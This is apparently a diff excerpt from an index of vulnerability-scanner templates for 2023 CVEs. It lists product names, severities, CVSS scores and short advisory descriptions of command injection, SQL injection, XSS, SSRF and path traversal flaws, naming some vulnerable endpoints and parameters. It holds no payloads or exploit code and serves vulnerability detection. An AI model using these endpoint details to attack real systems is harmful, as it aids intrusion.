{"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"} {"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"}
{"ID":"CVE-2023-30534","Info":{"Name":"Cacti \u003c 1.2.25 Insecure Deserialization","Severity":"medium","Description":"Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2023/CVE-2023-30534.yaml"}
{"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"} {"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"}
{"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"} {"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"}
{"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"} {"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"}
@ -2102,7 +2110,7 @@
{"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"} {"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"}
{"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"} {"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"}
{"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"}
{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} {"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"}
{"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} {"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"}
{"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"} {"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"}
{"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"} {"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"}
@ -2159,7 +2167,7 @@
{"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"} {"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"}
{"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"} {"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"}
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} {"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
{"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"} {"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"}
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"} {"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
{"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"} {"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"}
{"ID":"CVE-2023-39109","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39109.yaml"} {"ID":"CVE-2023-39109","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39109.yaml"}
@ -2178,12 +2186,15 @@
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"} {"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"} {"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"} {"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
{"ID":"CVE-2023-4111","Info":{"Name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4111.yaml"} {"ID":"CVE-2023-4111","Info":{"Name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4111.yaml"}
{"ID":"CVE-2023-4112","Info":{"Name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4112.yaml"} {"ID":"CVE-2023-4112","Info":{"Name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4112.yaml"}
{"ID":"CVE-2023-4113","Info":{"Name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4113.yaml"} {"ID":"CVE-2023-4113","Info":{"Name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4113.yaml"}
{"ID":"CVE-2023-4114","Info":{"Name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4114.yaml"} {"ID":"CVE-2023-4114","Info":{"Name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4114.yaml"}
{"ID":"CVE-2023-4115","Info":{"Name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4115.yaml"} {"ID":"CVE-2023-4115","Info":{"Name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4115.yaml"}
{"ID":"CVE-2023-4116","Info":{"Name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4116.yaml"} {"ID":"CVE-2023-4116","Info":{"Name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4116.yaml"}
{"ID":"CVE-2023-41265","Info":{"Name":"Qlik Sense Enterprise - HTTP Request Smuggling","Severity":"critical","Description":"An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-41265.yaml"}
{"ID":"CVE-2023-41266","Info":{"Name":"Qlik Sense Enterprise - Path Traversal","Severity":"medium","Description":"A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-41266.yaml"}
{"ID":"CVE-2023-4148","Info":{"Name":"Ditty \u003c 3.1.25 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4148.yaml"} {"ID":"CVE-2023-4148","Info":{"Name":"Ditty \u003c 3.1.25 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4148.yaml"}
{"ID":"CVE-2023-41538","Info":{"Name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","Severity":"medium","Description":"PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41538.yaml"} {"ID":"CVE-2023-41538","Info":{"Name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","Severity":"medium","Description":"PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41538.yaml"}
{"ID":"CVE-2023-41642","Info":{"Name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","Severity":"medium","Description":"Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41642.yaml"} {"ID":"CVE-2023-41642","Info":{"Name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","Severity":"medium","Description":"Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41642.yaml"}
@ -2191,7 +2202,9 @@
{"ID":"CVE-2023-4169","Info":{"Name":"Ruijie RG-EW1200G Router - Password Reset","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4169.yaml"} {"ID":"CVE-2023-4169","Info":{"Name":"Ruijie RG-EW1200G Router - Password Reset","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4169.yaml"}
{"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
{"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"}
